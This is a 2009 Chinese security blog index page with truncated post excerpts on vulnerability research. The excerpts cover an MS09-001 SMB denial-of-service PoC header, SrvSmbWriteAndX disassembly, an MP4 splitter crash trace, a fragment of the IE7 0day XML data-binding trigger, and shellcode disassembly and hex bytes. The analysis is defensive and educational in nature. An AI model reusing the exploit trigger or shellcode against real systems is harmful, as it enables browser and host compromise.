vessial's easylife
百度空间 | 百度首页 
               
 
文章列表
 
2009-07-01 16:03

     这些天注意到blackhat 2009一个关于虚拟机agent端注入在Guest OS里面执行代码的议题,演讲者是

symantec的matt conover,大体思想是讲从host os注入到代码到VM的agent里面,然后在guest os里面执行

代码的这么一个过程,现在我也不知道他是怎么实现的,但是我把我自已的猜想和大家分享一下,看看

是否行得通,去年在安全软件峰会上听过孙冰讲的虚拟机技术,他算得上
 
2009-06-07 18:05
对于格式漏洞最容易出现的就是死循环,所以对于这种漏洞的查找方法,我个人方法是人肉(开玩笑),关注那些函数里面使用循环操作的代码,然后构造样本测试,当然首先你得确保你得让程序可以走到这里来,可以让它测试你觉得它有问题的代码,这就涉及到一个你所测试的这个程序所支持的文件格式,了解它的文件的数据结构,然后在调试的时候构造数据,测试,这样漏洞出现频率最高也就是CPU消耗100%,crash之类的,呵呵,可利用的得看人品了,呵呵.
下面的这个循环,就可以构造相应的媒体文件,让它
 
2009-06-07 17:43
随便人肉一下就发现好几个,寒,不过MS搞MP4解码器的挺少, post一个最简单的,也就是分配内存的时候没有检测长度,导致构造一个 很长的数据传递进去,造成内存分配失败,异常,crash,不能利用, 仅仅为了本地D.O.S.
0:023> k
ChildEBP RetAddr 0841fcd0 070c62ea kernel32!RaiseException+0x53 0841fd08 070b78e6 MP4Splitter!_CxxThrowException+0x48 [f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\throw.cpp @ 161] 0841fd1c 070b77cc MP4Splitter!AfxThrowMemoryException+0x1b [f:\dd\vctools\vc7libs\ship\at
 
2009-01-29 20:26
今天用python写了一个SMB dos的poc,测试vista sp1,

一个包过去立刻蓝屏,不过XP SP2不行,因为XP SP2下面默认不允许空会话访问lsarpc,samr等命名管道。

# MS09-001 SMB Dos Vulnerabilities Poc Exploit
# Author : vessial
# http://hi.baidu.com/vessial
# Todo:
# [+] test vista sp1,system BOSD
# Reference :http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx
#            
 
2009-01-16 16:21
这个漏洞在SMB服务的Write Andx请求包处理时触发,在SrvSmbWriteAndX(x)处理函数中,

这里是根源性的问题所在,看如下的代码片断

PAGE:F7EA11BB                                         ; SrvSmbWriteAndX(x)+D9B6 j
PAGE:F7EA11BB         
 
2009-01-06 14:02
     不得不说一些,现在的人越来越不厚道,脸皮也越来越厚了,越来越会忽悠了,这种文章 居然还相继转载,真是脑壳进水了。

来揭露一下这个伪0day.
原文如下

From:http://www.friddy.cn/article.asp?id=66

Microsoft Windows WorkStation 服务(windows xp sp3)存在栈溢出漏洞
a5这个参数
 
2008-12-11 15:01
昨天不小心看到knownsec安全团队发的文章,所以就想看看到底是怎么造成的。
这两天这个IE7的0day挺热的,我也凑凑热闹,说实话,不怎么会javascript,所以分析也挺费劲的,
但是大体知道是个怎么回事触发这个漏洞的了

0day代码片断
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://&#114;&#2570;&#114;.book.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMAT
 
2008-12-11 11:20

0A0FFCBE    68 33320000     push    3233
0A0FFCC3    68 75736572     push    72657375
0A0FFCC8    EB 15           jmp     short 0A0FFCDF
0A0FFCCA    8D4424 04       lea     eax, dword ptr [esp+4]
0A0FFCCE 
 
2008-12-11 11:18

对应的汇编代码如下
0A0FF9FB    58              pop     eax
0A0FF9FC    58              pop     eax
0A0FF9FD    33DB            xor     ebx, ebx
0A0FF9FF    B3 1C
 
2008-12-11 11:18
简单写一下,
shellcode如下,执行前
0A0FF9C0 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A ................
0A0FF9D0 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A ................
0A0FF9E0 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 90 90 25 00 75 00 ..........悙%.u.
0A0FF9F0 90 90 90 90 D9 E1 D9 34 24 58 58 58 58 33 DB B3 悙悙籴?$XXXX3鄢
0A0FFA00 1C 03 C3 31 C9 66 81 E9 65 FA 80 30 21 40 E2 FA ?蒮侀e鷢0!@恸
0A0FFA10 C9 17 22 21 21 49 21 01 21 21 4B 21 DE F1 98 21
 
     
 
 
个人档案
 
vessial
男, 27岁
北京 海淀区 
上次登录:
5天前
加为好友
 
   
 
文章分类
 
 
 
 
 
 
 
 
     
 
最新评论
 
文章评论|照片评论

     
 
好友最新文章
 
     
 
最近访客
 
 

文雨o7

wanghonglou82

hi_earth

jyf1987

megadethsun

落英6096

infoCtrl

雪谷月夜
     
 
背景音乐
 
 
其它
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2009 Baidu